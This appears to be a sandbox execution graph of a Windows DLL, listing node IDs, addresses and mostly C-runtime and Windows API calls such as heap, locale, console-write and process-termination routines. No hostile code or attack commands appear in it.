                                                                      execution_graph 7078 238d220c 7079 238d221a dllmain_dispatch 7078->7079 7080 238d2215 7078->7080 7082 238d22b1 7080->7082 7083 238d22c7 7082->7083 7085 238d22d0 7083->7085 7086 238d2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7083->7086 7085->7079 7086->7085 7272 238d284f 7273 238d2882 std::exception::exception 27 API calls 7272->7273 7274 238d285d 7273->7274 7275 238d724e GetProcessHeap 6010 238d8a89 6013 238d6d60 6010->6013 6014 238d6d69 6013->6014 6015 238d6d72 6013->6015 6017 238d6c5f 6014->6017 6037 238d5af6 GetLastError 6017->6037 6019 238d6c6c 6057 238d6d7e 6019->6057 6021 238d6c74 6066 238d69f3 6021->6066 6024 238d6c8b 6024->6015 6029 238d571e _free 20 API calls 6029->6024 6030 238d6cc9 6032 238d6368 __dosmaperr 20 API calls 6030->6032 6031 238d6ce6 6033 238d6d12 6031->6033 6034 238d571e _free 20 API calls 6031->6034 6036 238d6cce 6032->6036 6033->6036 6090 238d68c9 6033->6090 6034->6033 6036->6029 6038 238d5b0c 6037->6038 6039 238d5b12 6037->6039 6040 238d5e08 __dosmaperr 11 API calls 6038->6040 6041 238d637b __dosmaperr 20 API calls 6039->6041 6043 238d5b61 SetLastError 6039->6043 6040->6039 6042 238d5b24 6041->6042 6044 238d5b2c 6042->6044 6045 238d5e5e __dosmaperr 11 API calls 6042->6045 6043->6019 6046 238d571e _free 20 API calls 6044->6046 6047 238d5b41 6045->6047 6048 238d5b32 6046->6048 6047->6044 6049 238d5b48 6047->6049 6050 238d5b6d SetLastError 6048->6050 6051 238d593c __dosmaperr 20 API calls 6049->6051 6093 238d55a8 6050->6093 6052 238d5b53 6051->6052 6054 238d571e _free 20 API calls 6052->6054 6056 238d5b5a 6054->6056 6056->6043 6056->6050 6058 238d6d8a ___scrt_is_nonwritable_in_current_image 6057->6058 6059 238d5af6 _abort 38 API calls 6058->6059 6064 238d6d94 6059->6064 6061 238d6e18 _abort 6061->6021 6063 238d55a8 _abort 38 API calls 6063->6064 6064->6061 6064->6063 6065 238d571e _free 20 API calls 6064->6065 6266 238d5671 RtlEnterCriticalSection 6064->6266 6267 238d6e0f 6064->6267 6065->6064 6271 238d54a7 6066->6271 6069 238d6a14 GetOEMCP 6072 238d6a3d 6069->6072 6070 238d6a26 6071 238d6a2b GetACP 6070->6071 6070->6072 6071->6072 6072->6024 6073 238d56d0 6072->6073 6074 238d570e 6073->6074 6075 238d56de __dosmaperr 6073->6075 6077 238d6368 __dosmaperr 20 API calls 6074->6077 6075->6074 6076 238d56f9 RtlAllocateHeap 6075->6076 6079 238d474f __dosmaperr 7 API calls 6075->6079 6076->6075 6078 238d570c 6076->6078 6077->6078 6078->6036 6080 238d6e20 6078->6080 6079->6075 6081 238d69f3 40 API calls 6080->6081 6082 238d6e3f 6081->6082 6085 238d6e90 IsValidCodePage 6082->6085 6087 238d6e46 6082->6087 6089 238d6eb5 ___scrt_fastfail 6082->6089 6083 238d2ada _ValidateLocalCookies 5 API calls 6084 238d6cc1 6083->6084 6084->6030 6084->6031 6086 238d6ea2 GetCPInfo 6085->6086 6085->6087 6086->6087 6086->6089 6087->6083 6418 238d6acb GetCPInfo 6089->6418 6491 238d6886 6090->6491 6092 238d68ed 6092->6036 6104 238d7613 6093->6104 6097 238d55e0 6140 238d4bc1 6097->6140 6098 238d55c2 IsProcessorFeaturePresent 6101 238d55cd 6098->6101 6100 238d55b8 6100->6097 6100->6098 6134 238d60e2 6101->6134 6143 238d7581 6104->6143 6107 238d766e 6108 238d767a _abort 6107->6108 6109 238d5b7a __dosmaperr 20 API calls 6108->6109 6113 238d76a7 _abort 6108->6113 6114 238d76a1 _abort 6108->6114 6109->6114 6110 238d76f3 6111 238d6368 __dosmaperr 20 API calls 6110->6111 6112 238d76f8 6111->6112 6157 238d62ac 6112->6157 6119 238d771f 6113->6119 6160 238d5671 RtlEnterCriticalSection 6113->6160 6114->6110 6114->6113 6133 238d76d6 6114->6133 6120 238d777e 6119->6120 6122 238d7776 6119->6122 6130 238d77a9 6119->6130 6161 238d56b9 RtlLeaveCriticalSection 6119->6161 6120->6130 6162 238d7665 6120->6162 6125 238d4bc1 _abort 28 API calls 6122->6125 6125->6120 6127 238d5af6 _abort 38 API calls 6131 238d780c 6127->6131 6129 238d7665 _abort 38 API calls 6129->6130 6165 238d782e 6130->6165 6132 238d5af6 _abort 38 API calls 6131->6132 6131->6133 6132->6133 6169 238dbdc9 6133->6169 6135 238d60fe ___scrt_fastfail 6134->6135 6136 238d612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6135->6136 6137 238d61fb ___scrt_fastfail 6136->6137 6138 238d2ada _ValidateLocalCookies 5 API calls 6137->6138 6139 238d6219 6138->6139 6139->6097 6188 238d499b 6140->6188 6146 238d7527 6143->6146 6145 238d55ad 6145->6100 6145->6107 6147 238d7533 ___scrt_is_nonwritable_in_current_image 6146->6147 6152 238d5671 RtlEnterCriticalSection 6147->6152 6149 238d7541 6153 238d7575 6149->6153 6151 238d7568 _abort 6151->6145 6152->6149 6156 238d56b9 RtlLeaveCriticalSection 6153->6156 6155 238d757f 6155->6151 6156->6155 6172 238d6231 6157->6172 6159 238d62b8 6159->6133 6160->6119 6161->6122 6163 238d5af6 _abort 38 API calls 6162->6163 6164 238d766a 6163->6164 6164->6129 6166 238d77fd 6165->6166 6167 238d7834 6165->6167 6166->6127 6166->6131 6166->6133 6187 238d56b9 RtlLeaveCriticalSection 6167->6187 6170 238d2ada _ValidateLocalCookies 5 API calls 6169->6170 6171 238dbdd4 6170->6171 6171->6171 6173 238d5b7a __dosmaperr 20 API calls 6172->6173 6174 238d6247 6173->6174 6175 238d62a6 6174->6175 6178 238d6255 6174->6178 6183 238d62bc IsProcessorFeaturePresent 6175->6183 6177 238d62ab 6179 238d6231 _abort 26 API calls 6177->6179 6180 238d2ada _ValidateLocalCookies 5 API calls 6178->6180 6181 238d62b8 6179->6181 6182 238d627c 6180->6182 6181->6159 6182->6159 6184 238d62c7 6183->6184 6185 238d60e2 _abort 8 API calls 6184->6185 6186 238d62dc GetCurrentProcess TerminateProcess 6185->6186 6186->6177 6187->6166 6189 238d49a7 _abort 6188->6189 6190 238d49bf 6189->6190 6210 238d4af5 GetModuleHandleW 6189->6210 6219 238d5671 RtlEnterCriticalSection 6190->6219 6194 238d4a65 6227 238d4aa5 6194->6227 6197 238d4a3c 6201 238d4a54 6197->6201 6223 238d4669 6197->6223 6199 238d4aae 6204 238dbdc9 _abort 5 API calls 6199->6204 6200 238d4a82 6230 238d4ab4 6200->6230 6206 238d4669 _abort 5 API calls 6201->6206 6209 238d4ab3 6204->6209 6206->6194 6207 238d49c7 6207->6194 6207->6197 6220 238d527a 6207->6220 6211 238d49b3 6210->6211 6211->6190 6212 238d4b39 GetModuleHandleExW 6211->6212 6213 238d4b63 GetProcAddress 6212->6213 6214 238d4b78 6212->6214 6213->6214 6215 238d4b8c FreeLibrary 6214->6215 6216 238d4b95 6214->6216 6215->6216 6217 238d2ada _ValidateLocalCookies 5 API calls 6216->6217 6218 238d4b9f 6217->6218 6218->6190 6219->6207 6238 238d5132 6220->6238 6226 238d4698 6223->6226 6224 238d2ada _ValidateLocalCookies 5 API calls 6225 238d46c1 6224->6225 6225->6201 6226->6224 6259 238d56b9 RtlLeaveCriticalSection 6227->6259 6229 238d4a7e 6229->6199 6229->6200 6260 238d6025 6230->6260 6233 238d4ae2 6236 238d4b39 _abort 8 API calls 6233->6236 6234 238d4ac2 GetPEB 6234->6233 6235 238d4ad2 GetCurrentProcess TerminateProcess 6234->6235 6235->6233 6237 238d4aea ExitProcess 6236->6237 6241 238d50e1 6238->6241 6240 238d5156 6240->6197 6242 238d50ed ___scrt_is_nonwritable_in_current_image 6241->6242 6249 238d5671 RtlEnterCriticalSection 6242->6249 6244 238d50fb 6250 238d515a 6244->6250 6248 238d5119 _abort 6248->6240 6249->6244 6251 238d517a 6250->6251 6254 238d5182 6250->6254 6252 238d2ada _ValidateLocalCookies 5 API calls 6251->6252 6253 238d5108 6252->6253 6256 238d5126 6253->6256 6254->6251 6255 238d571e _free 20 API calls 6254->6255 6255->6251 6257 238d56b9 _abort RtlLeaveCriticalSection 6256->6257 6258 238d5130 6257->6258 6258->6248 6259->6229 6261 238d604a 6260->6261 6265 238d6040 6260->6265 6262 238d5c45 __dosmaperr 5 API calls 6261->6262 6262->6265 6263 238d2ada _ValidateLocalCookies 5 API calls 6264 238d4abe 6263->6264 6264->6233 6264->6234 6265->6263 6266->6064 6270 238d56b9 RtlLeaveCriticalSection 6267->6270 6269 238d6e16 6269->6064 6270->6269 6272 238d54ba 6271->6272 6273 238d54c4 6271->6273 6272->6069 6272->6070 6273->6272 6274 238d5af6 _abort 38 API calls 6273->6274 6275 238d54e5 6274->6275 6279 238d7a00 6275->6279 6280 238d54fe 6279->6280 6281 238d7a13 6279->6281 6283 238d7a2d 6280->6283 6281->6280 6287 238d7f0f 6281->6287 6284 238d7a55 6283->6284 6285 238d7a40 6283->6285 6284->6272 6285->6284 6286 238d6d7e __fassign 38 API calls 6285->6286 6286->6284 6288 238d7f1b ___scrt_is_nonwritable_in_current_image 6287->6288 6289 238d5af6 _abort 38 API calls 6288->6289 6290 238d7f24 6289->6290 6291 238d7f72 _abort 6290->6291 6299 238d5671 RtlEnterCriticalSection 6290->6299 6291->6280 6293 238d7f42 6300 238d7f86 6293->6300 6298 238d55a8 _abort 38 API calls 6298->6291 6299->6293 6301 238d7f94 __fassign 6300->6301 6303 238d7f56 6300->6303 6301->6303 6307 238d7cc2 6301->6307 6304 238d7f75 6303->6304 6417 238d56b9 RtlLeaveCriticalSection 6304->6417 6306 238d7f69 6306->6291 6306->6298 6308 238d7d42 6307->6308 6311 238d7cd8 6307->6311 6309 238d7d90 6308->6309 6312 238d571e _free 20 API calls 6308->6312 6375 238d7e35 6309->6375 6311->6308 6313 238d7d0b 6311->6313 6318 238d571e _free 20 API calls 6311->6318 6314 238d7d64 6312->6314 6315 238d7d2d 6313->6315 6324 238d571e _free 20 API calls 6313->6324 6316 238d571e _free 20 API calls 6314->6316 6317 238d571e _free 20 API calls 6315->6317 6319 238d7d77 6316->6319 6321 238d7d37 6317->6321 6323 238d7d00 6318->6323 6325 238d571e _free 20 API calls 6319->6325 6320 238d7d9e 6322 238d7dfe 6320->6322 6329 238d571e 20 API calls _free 6320->6329 6326 238d571e _free 20 API calls 6321->6326 6327 238d571e _free 20 API calls 6322->6327 6335 238d90ba 6323->6335 6330 238d7d22 6324->6330 6331 238d7d85 6325->6331 6326->6308 6332 238d7e04 6327->6332 6329->6320 6363 238d91b8 6330->6363 6334 238d571e _free 20 API calls 6331->6334 6332->6303 6334->6309 6336 238d90cb 6335->6336 6362 238d91b4 6335->6362 6337 238d90dc 6336->6337 6338 238d571e _free 20 API calls 6336->6338 6339 238d90ee 6337->6339 6340 238d571e _free 20 API calls 6337->6340 6338->6337 6341 238d9100 6339->6341 6343 238d571e _free 20 API calls 6339->6343 6340->6339 6342 238d9112 6341->6342 6344 238d571e _free 20 API calls 6341->6344 6345 238d9124 6342->6345 6346 238d571e _free 20 API calls 6342->6346 6343->6341 6344->6342 6347 238d9136 6345->6347 6348 238d571e _free 20 API calls 6345->6348 6346->6345 6349 238d9148 6347->6349 6350 238d571e _free 20 API calls 6347->6350 6348->6347 6351 238d571e _free 20 API calls 6349->6351 6352 238d915a 6349->6352 6350->6349 6351->6352 6353 238d571e _free 20 API calls 6352->6353 6355 238d916c 6352->6355 6353->6355 6354 238d917e 6357 238d9190 6354->6357 6359 238d571e _free 20 API calls 6354->6359 6355->6354 6356 238d571e _free 20 API calls 6355->6356 6356->6354 6358 238d91a2 6357->6358 6360 238d571e _free 20 API calls 6357->6360 6361 238d571e _free 20 API calls 6358->6361 6358->6362 6359->6357 6360->6358 6361->6362 6362->6313 6364 238d91c5 6363->6364 6374 238d921d 6363->6374 6365 238d91d5 6364->6365 6366 238d571e _free 20 API calls 6364->6366 6367 238d91e7 6365->6367 6369 238d571e _free 20 API calls 6365->6369 6366->6365 6368 238d91f9 6367->6368 6370 238d571e _free 20 API calls 6367->6370 6371 238d920b 6368->6371 6372 238d571e _free 20 API calls 6368->6372 6369->6367 6370->6368 6373 238d571e _free 20 API calls 6371->6373 6371->6374 6372->6371 6373->6374 6374->6315 6376 238d7e60 6375->6376 6377 238d7e42 6375->6377 6376->6320 6377->6376 6381 238d925d 6377->6381 6380 238d571e _free 20 API calls 6380->6376 6382 238d7e5a 6381->6382 6383 238d926e 6381->6383 6382->6380 6384 238d9221 __fassign 20 API calls 6383->6384 6385 238d9276 6384->6385 6386 238d9221 __fassign 20 API calls 6385->6386 6387 238d9281 6386->6387 6388 238d9221 __fassign 20 API calls 6387->6388 6389 238d928c 6388->6389 6390 238d9221 __fassign 20 API calls 6389->6390 6391 238d9297 6390->6391 6392 238d9221 __fassign 20 API calls 6391->6392 6393 238d92a5 6392->6393 6394 238d571e _free 20 API calls 6393->6394 6395 238d92b0 6394->6395 6396 238d571e _free 20 API calls 6395->6396 6397 238d92bb 6396->6397 6398 238d571e _free 20 API calls 6397->6398 6399 238d92c6 6398->6399 6400 238d9221 __fassign 20 API calls 6399->6400 6401 238d92d4 6400->6401 6402 238d9221 __fassign 20 API calls 6401->6402 6403 238d92e2 6402->6403 6404 238d9221 __fassign 20 API calls 6403->6404 6405 238d92f3 6404->6405 6406 238d9221 __fassign 20 API calls 6405->6406 6407 238d9301 6406->6407 6408 238d9221 __fassign 20 API calls 6407->6408 6409 238d930f 6408->6409 6410 238d571e _free 20 API calls 6409->6410 6411 238d931a 6410->6411 6412 238d571e _free 20 API calls 6411->6412 6413 238d9325 6412->6413 6414 238d571e _free 20 API calls 6413->6414 6415 238d9330 6414->6415 6416 238d571e _free 20 API calls 6415->6416 6416->6382 6417->6306 6419 238d6baf 6418->6419 6420 238d6b05 6418->6420 6423 238d2ada _ValidateLocalCookies 5 API calls 6419->6423 6428 238d86e4 6420->6428 6424 238d6c5b 6423->6424 6424->6087 6427 238d8a3e 43 API calls 6427->6419 6429 238d54a7 __fassign 38 API calls 6428->6429 6430 238d8704 MultiByteToWideChar 6429->6430 6432 238d8742 6430->6432 6438 238d87da 6430->6438 6434 238d56d0 21 API calls 6432->6434 6439 238d8763 ___scrt_fastfail 6432->6439 6433 238d2ada _ValidateLocalCookies 5 API calls 6435 238d6b66 6433->6435 6434->6439 6442 238d8a3e 6435->6442 6436 238d87d4 6447 238d8801 6436->6447 6438->6433 6439->6436 6440 238d87a8 MultiByteToWideChar 6439->6440 6440->6436 6441 238d87c4 GetStringTypeW 6440->6441 6441->6436 6443 238d54a7 __fassign 38 API calls 6442->6443 6444 238d8a51 6443->6444 6451 238d8821 6444->6451 6448 238d880d 6447->6448 6449 238d881e 6447->6449 6448->6449 6450 238d571e _free 20 API calls 6448->6450 6449->6438 6450->6449 6452 238d883c 6451->6452 6453 238d8862 MultiByteToWideChar 6452->6453 6454 238d888c 6453->6454 6455 238d8a16 6453->6455 6460 238d56d0 21 API calls 6454->6460 6461 238d88ad 6454->6461 6456 238d2ada _ValidateLocalCookies 5 API calls 6455->6456 6457 238d6b87 6456->6457 6457->6427 6458 238d8962 6464 238d8801 __freea 20 API calls 6458->6464 6459 238d88f6 MultiByteToWideChar 6459->6458 6462 238d890f 6459->6462 6460->6461 6461->6458 6461->6459 6478 238d5f19 6462->6478 6464->6455 6466 238d8939 6466->6458 6470 238d5f19 11 API calls 6466->6470 6467 238d8971 6468 238d56d0 21 API calls 6467->6468 6472 238d8992 6467->6472 6468->6472 6469 238d8a07 6471 238d8801 __freea 20 API calls 6469->6471 6470->6458 6471->6458 6472->6469 6473 238d5f19 11 API calls 6472->6473 6474 238d89e6 6473->6474 6474->6469 6475 238d89f5 WideCharToMultiByte 6474->6475 6475->6469 6476 238d8a35 6475->6476 6477 238d8801 __freea 20 API calls 6476->6477 6477->6458 6479 238d5c45 __dosmaperr 5 API calls 6478->6479 6480 238d5f40 6479->6480 6483 238d5f49 6480->6483 6486 238d5fa1 6480->6486 6484 238d2ada _ValidateLocalCookies 5 API calls 6483->6484 6485 238d5f9b 6484->6485 6485->6458 6485->6466 6485->6467 6487 238d5c45 __dosmaperr 5 API calls 6486->6487 6488 238d5fc8 6487->6488 6489 238d2ada _ValidateLocalCookies 5 API calls 6488->6489 6490 238d5f89 LCMapStringW 6489->6490 6490->6483 6492 238d6892 ___scrt_is_nonwritable_in_current_image 6491->6492 6499 238d5671 RtlEnterCriticalSection 6492->6499 6494 238d689c 6500 238d68f1 6494->6500 6498 238d68b5 _abort 6498->6092 6499->6494 6512 238d7011 6500->6512 6502 238d693f 6503 238d7011 26 API calls 6502->6503 6504 238d695b 6503->6504 6505 238d7011 26 API calls 6504->6505 6506 238d6979 6505->6506 6507 238d571e _free 20 API calls 6506->6507 6508 238d68a9 6506->6508 6507->6508 6509 238d68bd 6508->6509 6526 238d56b9 RtlLeaveCriticalSection 6509->6526 6511 238d68c7 6511->6498 6513 238d7022 6512->6513 6519 238d701e 6512->6519 6514 238d703c ___scrt_fastfail 6513->6514 6515 238d7029 6513->6515 6514->6519 6520 238d706a 6514->6520 6521 238d7073 6514->6521 6516 238d6368 __dosmaperr 20 API calls 6515->6516 6517 238d702e 6516->6517 6518 238d62ac _abort 26 API calls 6517->6518 6518->6519 6519->6502 6522 238d6368 __dosmaperr 20 API calls 6520->6522 6521->6519 6524 238d6368 __dosmaperr 20 API calls 6521->6524 6523 238d706f 6522->6523 6525 238d62ac _abort 26 API calls 6523->6525 6524->6523 6525->6519 6526->6511 7276 238d2049 7278 238d2055 ___scrt_is_nonwritable_in_current_image 7276->7278 7277 238d205e 7278->7277 7279 238d207d 7278->7279 7280 238d20d3 7278->7280 7290 238d244c 7279->7290 7281 238d2639 ___scrt_fastfail 4 API calls 7280->7281 7283 238d20da 7281->7283 7284 238d2082 7299 238d2308 7284->7299 7286 238d2087 __RTC_Initialize 7302 238d20c4 7286->7302 7288 238d209f 7305 238d260b 7288->7305 7291 238d2451 ___scrt_release_startup_lock 7290->7291 7292 238d2455 7291->7292 7296 238d2461 7291->7296 7293 238d527a _abort 20 API calls 7292->7293 7294 238d245f 7293->7294 7294->7284 7295 238d246e 7295->7284 7296->7295 7297 238d499b _abort 28 API calls 7296->7297 7298 238d4bbd 7297->7298 7298->7284 7311 238d34c7 RtlInterlockedFlushSList 7299->7311 7301 238d2312 7301->7286 7313 238d246f 7302->7313 7304 238d20c9 ___scrt_release_startup_lock 7304->7288 7306 238d2617 7305->7306 7307 238d262d 7306->7307 7321 238d53ed 7306->7321 7307->7277 7310 238d3529 ___vcrt_uninitialize 8 API calls 7310->7307 7312 238d34d7 7311->7312 7312->7301 7318 238d53ff 7313->7318 7316 238d391b ___vcrt_uninitialize_ptd 6 API calls 7317 238d354d 7316->7317 7317->7304 7319 238d5c2b 11 API calls 7318->7319 7320 238d2476 7319->7320 7320->7316 7324 238d74da 7321->7324 7326 238d74f3 7324->7326 7325 238d2ada _ValidateLocalCookies 5 API calls 7327 238d2625 7325->7327 7326->7325 7327->7310 7328 238d5348 7329 238d3529 ___vcrt_uninitialize 8 API calls 7328->7329 7330 238d534f 7329->7330 7331 238d7b48 7341 238d8ebf 7331->7341 7335 238d7b55 7354 238d907c 7335->7354 7338 238d7b7f 7339 238d571e _free 20 API calls 7338->7339 7340 238d7b8a 7339->7340 7358 238d8ec8 7341->7358 7343 238d7b50 7344 238d8fdc 7343->7344 7345 238d8fe8 ___scrt_is_nonwritable_in_current_image 7344->7345 7378 238d5671 RtlEnterCriticalSection 7345->7378 7347 238d905e 7392 238d9073 7347->7392 7349 238d8ff3 7349->7347 7351 238d9032 RtlDeleteCriticalSection 7349->7351 7379 238da09c 7349->7379 7350 238d906a _abort 7350->7335 7352 238d571e _free 20 API calls 7351->7352 7352->7349 7355 238d7b64 RtlDeleteCriticalSection 7354->7355 7356 238d9092 7354->7356 7355->7335 7355->7338 7356->7355 7357 238d571e _free 20 API calls 7356->7357 7357->7355 7359 238d8ed4 ___scrt_is_nonwritable_in_current_image 7358->7359 7368 238d5671 RtlEnterCriticalSection 7359->7368 7361 238d8f77 7373 238d8f97 7361->7373 7365 238d8f83 _abort 7365->7343 7366 238d8ee3 7366->7361 7367 238d8e78 66 API calls 7366->7367 7369 238d7b94 RtlEnterCriticalSection 7366->7369 7370 238d8f6d 7366->7370 7367->7366 7368->7366 7369->7366 7376 238d7ba8 RtlLeaveCriticalSection 7370->7376 7372 238d8f75 7372->7366 7377 238d56b9 RtlLeaveCriticalSection 7373->7377 7375 238d8f9e 7375->7365 7376->7372 7377->7375 7378->7349 7380 238da0a8 ___scrt_is_nonwritable_in_current_image 7379->7380 7381 238da0ce 7380->7381 7382 238da0b9 7380->7382 7391 238da0c9 _abort 7381->7391 7395 238d7b94 RtlEnterCriticalSection 7381->7395 7383 238d6368 __dosmaperr 20 API calls 7382->7383 7385 238da0be 7383->7385 7387 238d62ac _abort 26 API calls 7385->7387 7386 238da0ea 7396 238da026 7386->7396 7387->7391 7389 238da0f5 7412 238da112 7389->7412 7391->7349 7660 238d56b9 RtlLeaveCriticalSection 7392->7660 7394 238d907a 7394->7350 7395->7386 7397 238da048 7396->7397 7398 238da033 7396->7398 7404 238da043 7397->7404 7415 238d8e12 7397->7415 7399 238d6368 __dosmaperr 20 API calls 7398->7399 7400 238da038 7399->7400 7403 238d62ac _abort 26 API calls 7400->7403 7403->7404 7404->7389 7405 238d907c 20 API calls 7406 238da064 7405->7406 7421 238d7a5a 7406->7421 7408 238da06a 7428 238dadce 7408->7428 7411 238d571e _free 20 API calls 7411->7404 7659 238d7ba8 RtlLeaveCriticalSection 7412->7659 7414 238da11a 7414->7391 7416 238d8e2a 7415->7416 7420 238d8e26 7415->7420 7417 238d7a5a 26 API calls 7416->7417 7416->7420 7418 238d8e4a 7417->7418 7443 238d9a22 7418->7443 7420->7405 7422 238d7a7b 7421->7422 7423 238d7a66 7421->7423 7422->7408 7424 238d6368 __dosmaperr 20 API calls 7423->7424 7425 238d7a6b 7424->7425 7426 238d62ac _abort 26 API calls 7425->7426 7427 238d7a76 7426->7427 7427->7408 7429 238daddd 7428->7429 7430 238dadf2 7428->7430 7431 238d6355 __dosmaperr 20 API calls 7429->7431 7432 238dae2d 7430->7432 7436 238dae19 7430->7436 7433 238dade2 7431->7433 7434 238d6355 __dosmaperr 20 API calls 7432->7434 7435 238d6368 __dosmaperr 20 API calls 7433->7435 7437 238dae32 7434->7437 7441 238da070 7435->7441 7616 238dada6 7436->7616 7439 238d6368 __dosmaperr 20 API calls 7437->7439 7440 238dae3a 7439->7440 7442 238d62ac _abort 26 API calls 7440->7442 7441->7404 7441->7411 7442->7441 7444 238d9a2e ___scrt_is_nonwritable_in_current_image 7443->7444 7445 238d9a4e 7444->7445 7446 238d9a36 7444->7446 7448 238d9aec 7445->7448 7452 238d9a83 7445->7452 7468 238d6355 7446->7468 7450 238d6355 __dosmaperr 20 API calls 7448->7450 7451 238d9af1 7450->7451 7454 238d6368 __dosmaperr 20 API calls 7451->7454 7471 238d8c7b RtlEnterCriticalSection 7452->7471 7453 238d6368 __dosmaperr 20 API calls 7456 238d9a43 _abort 7453->7456 7457 238d9af9 7454->7457 7456->7420 7459 238d62ac _abort 26 API calls 7457->7459 7458 238d9a89 7460 238d9aba 7458->7460 7461 238d9aa5 7458->7461 7459->7456 7472 238d9b0d 7460->7472 7462 238d6368 __dosmaperr 20 API calls 7461->7462 7464 238d9aaa 7462->7464 7466 238d6355 __dosmaperr 20 API calls 7464->7466 7465 238d9ab5 7523 238d9ae4 7465->7523 7466->7465 7469 238d5b7a __dosmaperr 20 API calls 7468->7469 7470 238d635a 7469->7470 7470->7453 7471->7458 7473 238d9b3b 7472->7473 7511 238d9b34 7472->7511 7474 238d9b3f 7473->7474 7475 238d9b5e 7473->7475 7477 238d6355 __dosmaperr 20 API calls 7474->7477 7478 238d9baf 7475->7478 7479 238d9b92 7475->7479 7476 238d2ada _ValidateLocalCookies 5 API calls 7480 238d9d15 7476->7480 7481 238d9b44 7477->7481 7483 238d9bc5 7478->7483 7526 238da00b 7478->7526 7482 238d6355 __dosmaperr 20 API calls 7479->7482 7480->7465 7484 238d6368 __dosmaperr 20 API calls 7481->7484 7486 238d9b97 7482->7486 7529 238d96b2 7483->7529 7488 238d9b4b 7484->7488 7490 238d6368 __dosmaperr 20 API calls 7486->7490 7491 238d62ac _abort 26 API calls 7488->7491 7494 238d9b9f 7490->7494 7491->7511 7492 238d9c0c 7498 238d9c66 WriteFile 7492->7498 7499 238d9c20 7492->7499 7493 238d9bd3 7495 238d9bf9 7493->7495 7496 238d9bd7 7493->7496 7497 238d62ac _abort 26 API calls 7494->7497 7541 238d9492 GetConsoleCP 7495->7541 7500 238d9ccd 7496->7500 7536 238d9645 7496->7536 7497->7511 7502 238d9c89 GetLastError 7498->7502 7507 238d9bef 7498->7507 7503 238d9c28 7499->7503 7504 238d9c56 7499->7504 7500->7511 7512 238d6368 __dosmaperr 20 API calls 7500->7512 7502->7507 7508 238d9c2d 7503->7508 7509 238d9c46 7503->7509 7567 238d9728 7504->7567 7507->7500 7507->7511 7515 238d9ca9 7507->7515 7508->7500 7552 238d9807 7508->7552 7559 238d98f5 7509->7559 7511->7476 7514 238d9cf2 7512->7514 7516 238d6355 __dosmaperr 20 API calls 7514->7516 7517 238d9cc4 7515->7517 7518 238d9cb0 7515->7518 7516->7511 7574 238d6332 7517->7574 7520 238d6368 __dosmaperr 20 API calls 7518->7520 7521 238d9cb5 7520->7521 7522 238d6355 __dosmaperr 20 API calls 7521->7522 7522->7511 7615 238d8c9e RtlLeaveCriticalSection 7523->7615 7525 238d9aea 7525->7456 7579 238d9f8d 7526->7579 7601 238d8dbc 7529->7601 7531 238d96c2 7532 238d96c7 7531->7532 7533 238d5af6 _abort 38 API calls 7531->7533 7532->7492 7532->7493 7534 238d96ea 7533->7534 7534->7532 7535 238d9708 GetConsoleMode 7534->7535 7535->7532 7537 238d966a 7536->7537 7540 238d969f 7536->7540 7538 238d96a1 GetLastError 7537->7538 7539 238da181 WriteConsoleW CreateFileW 7537->7539 7537->7540 7538->7540 7539->7537 7540->7507 7542 238d9607 7541->7542 7546 238d94f5 7541->7546 7543 238d2ada _ValidateLocalCookies 5 API calls 7542->7543 7544 238d9641 7543->7544 7544->7507 7546->7542 7547 238d957b WideCharToMultiByte 7546->7547 7548 238d79e6 40 API calls __fassign 7546->7548 7551 238d95d2 WriteFile 7546->7551 7610 238d7c19 7546->7610 7547->7542 7549 238d95a1 WriteFile 7547->7549 7548->7546 7549->7546 7550 238d962a GetLastError 7549->7550 7550->7542 7551->7546 7551->7550 7556 238d9816 7552->7556 7553 238d98d8 7555 238d2ada _ValidateLocalCookies 5 API calls 7553->7555 7554 238d9894 WriteFile 7554->7556 7557 238d98da GetLastError 7554->7557 7558 238d98f1 7555->7558 7556->7553 7556->7554 7557->7553 7558->7507 7564 238d9904 7559->7564 7560 238d9a0f 7561 238d2ada _ValidateLocalCookies 5 API calls 7560->7561 7563 238d9a1e 7561->7563 7562 238d9986 WideCharToMultiByte 7565 238d99bb WriteFile 7562->7565 7566 238d9a07 GetLastError 7562->7566 7563->7507 7564->7560 7564->7562 7564->7565 7565->7564 7565->7566 7566->7560 7571 238d9737 7567->7571 7568 238d97ea 7569 238d2ada _ValidateLocalCookies 5 API calls 7568->7569 7573 238d9803 7569->7573 7570 238d97a9 WriteFile 7570->7571 7572 238d97ec GetLastError 7570->7572 7571->7568 7571->7570 7572->7568 7573->7507 7575 238d6355 __dosmaperr 20 API calls 7574->7575 7576 238d633d __dosmaperr 7575->7576 7577 238d6368 __dosmaperr 20 API calls 7576->7577 7578 238d6350 7577->7578 7578->7511 7588 238d8d52 7579->7588 7581 238d9f9f 7582 238d9fb8 SetFilePointerEx 7581->7582 7583 238d9fa7 7581->7583 7585 238d9fac 7582->7585 7586 238d9fd0 GetLastError 7582->7586 7584 238d6368 __dosmaperr 20 API calls 7583->7584 7584->7585 7585->7483 7587 238d6332 __dosmaperr 20 API calls 7586->7587 7587->7585 7589 238d8d5f 7588->7589 7590 238d8d74 7588->7590 7591 238d6355 __dosmaperr 20 API calls 7589->7591 7592 238d6355 __dosmaperr 20 API calls 7590->7592 7596 238d8d99 7590->7596 7593 238d8d64 7591->7593 7594 238d8da4 7592->7594 7595 238d6368 __dosmaperr 20 API calls 7593->7595 7597 238d6368 __dosmaperr 20 API calls 7594->7597 7598 238d8d6c 7595->7598 7596->7581 7599 238d8dac 7597->7599 7598->7581 7600 238d62ac _abort 26 API calls 7599->7600 7600->7598 7602 238d8dc9 7601->7602 7603 238d8dd6 7601->7603 7604 238d6368 __dosmaperr 20 API calls 7602->7604 7605 238d6368 __dosmaperr 20 API calls 7603->7605 7607 238d8de2 7603->7607 7606 238d8dce 7604->7606 7608 238d8e03 7605->7608 7606->7531 7607->7531 7609 238d62ac _abort 26 API calls 7608->7609 7609->7606 7611 238d5af6 _abort 38 API calls 7610->7611 7612 238d7c24 7611->7612 7613 238d7a00 __fassign 38 API calls 7612->7613 7614 238d7c34 7613->7614 7614->7546 7615->7525 7619 238dad24 7616->7619 7618 238dadca 7618->7441 7620 238dad30 ___scrt_is_nonwritable_in_current_image 7619->7620 7630 238d8c7b RtlEnterCriticalSection 7620->7630 7622 238dad3e 7623 238dad65 7622->7623 7624 238dad70 7622->7624 7631 238dae4d 7623->7631 7626 238d6368 __dosmaperr 20 API calls 7624->7626 7627 238dad6b 7626->7627 7646 238dad9a 7627->7646 7629 238dad8d _abort 7629->7618 7630->7622 7632 238d8d52 26 API calls 